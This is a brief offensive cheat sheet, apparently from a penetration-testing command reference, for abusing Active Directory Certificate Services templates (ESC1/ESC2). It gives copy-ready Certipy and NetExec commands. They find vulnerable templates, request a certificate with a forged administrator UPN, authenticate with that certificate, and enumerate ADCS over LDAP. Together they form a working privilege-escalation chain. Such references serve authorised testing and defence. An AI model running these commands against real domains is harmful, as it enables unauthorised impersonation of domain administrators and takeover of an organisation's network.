ESC

ESC1 / ESC2

Copy command
certipy find -u '$USER@$DOMAIN' -p '$PASS' -dc-ip $DC -vulnerable

Description: Détecter templates vulnérables ESC1/ESC2.

Copy command
certipy req -u '$USER@$DOMAIN' -p '$PASS' -ca '$CA' -template '$TEMPLATE' -upn administrator@$DOMAIN

Description: Abuser SAN/UPN si template le permet.

Copy command
certipy auth -pfx administrator.pfx -dc-ip $DC

Description: Authentifier avec certificat compromis.

Copy command
nxc ldap $TARGET -u $USER -p $PASS -M adcs

Description: Croiser résultat Certipy avec enum LDAP ADCS.